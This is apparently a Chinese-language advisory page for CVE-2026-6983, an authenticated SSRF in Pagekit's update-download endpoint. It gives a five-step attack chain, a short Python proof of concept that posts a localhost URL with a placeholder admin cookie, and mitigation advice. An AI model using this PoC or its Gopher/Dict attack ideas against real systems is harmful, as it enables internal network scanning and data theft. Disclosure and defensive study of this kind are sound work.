CVE-2026-6983 CVSS 4.7 中危

CVE-2026-6983 Pagekit服务端请求伪造漏洞

披露日期: 2026-04-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6983

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Pagekit

漏洞概述

Pagekit 1.0.18 及之前版本被发现存在服务器端请求伪造（SSRF）漏洞。该漏洞位于 /index.php/admin/system/update/download 功能模块中，由于未对用户提供的 url 参数进行严格的验证和过滤，攻击者可利用该漏洞诱导服务器向内网或外部发起未经授权的请求。此漏洞需要高权限账户方可利用，可能导致敏感信息泄露。

技术细节

该漏洞根因在于 Pagekit 系统的更新下载模块（/index.php/admin/system/update/download）对输入参数 `url` 缺乏有效的安全校验。系统设计允许管理员指定下载更新包的地址，但未限制目标地址的范围（如内网 IP、本地回环地址等）。攻击者若已获取管理员权限，可构造包含内网地址或特殊协议的恶意 URL。服务器后端会直接解析该 URL 并发起请求，导致 SSRF。利用此漏洞，攻击者可以扫描内网开放端口、访问内网未授权的 Web 应用、利用 Gopher/Dict 协议攻击本地数据库服务（视 PHP 环境支持情况），或结合其他漏洞进行进一步攻击。由于需要高权限，利用门槛较高，但在内网渗透中具有极高价值。

攻击链分析

STEP 1

1. 获取权限

攻击者首先需要通过其他手段获取 Pagekit 管理员账户的权限（因为 CVSS PR:H）。

STEP 2

2. 构造 Payload

攻击者构造指向内网敏感资源（如 http://127.0.0.1/admin）的 URL 参数。

STEP 3

3. 发送请求

攻击者向 /index.php/admin/system/update/download 接口发送包含恶意 URL 的 POST 请求。

STEP 4

4. 服务端请求

Pagekit 服务器接收请求并解析 URL，向内网目标发起 HTTP 请求。

STEP 5

5. 信息回显

攻击者根据服务器的响应内容或响应时间，判断内网端口状态或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-6983 Pagekit SSRF
import requests

target_url = "http://target-pagekit-site.com/index.php/admin/system/update/download"
# Malicious URL to scan internal network (e.g., checking if port 80 is open on localhost)
malicious_payload = {
    "url": "http://127.0.0.1:80"
}

# Note: Requires Admin Authentication (Cookie/Session)
headers = {
    "Cookie": "YOUR_ADMIN_SESSION_COOKIE_HERE",
    "User-Agent": "Mozilla/5.0"
}

try:
    response = requests.post(target_url, data=malicious_payload, headers=headers)
    if response.status_code == 200:
        print("[*] Request sent successfully. Check response for indicators of SSRF.")
        print(f"Response content: {response.text[:200]}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Pagekit <= 1.0.18

防御指南

临时缓解措施

建议立即限制对 `/admin` 目录的访问，仅允许可信 IP 访问。在防火墙层面限制服务器的出站连接，禁止访问内网敏感地址段。如果无法立即升级，可考虑通过 WAF 拦截针对 `/index.php/admin/system/update/download` 的请求中对 `url` 参数包含内网 IP 或非白名单域名的流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6983
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6983
3 Details https://www.cvedetails.com/cve/CVE-2026-6983/
4 VulDB https://vuldb.com/cve/CVE-2026-6983
5 Link https://vuldb.com/submit/796163
6 Link https://vuldb.com/vuln/359526
7 Link https://vuldb.com/vuln/359526/cti
8 Link https://www.yuque.com/fortune-toq55/giqwnb/ek05kkfeg1gg8v6t

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表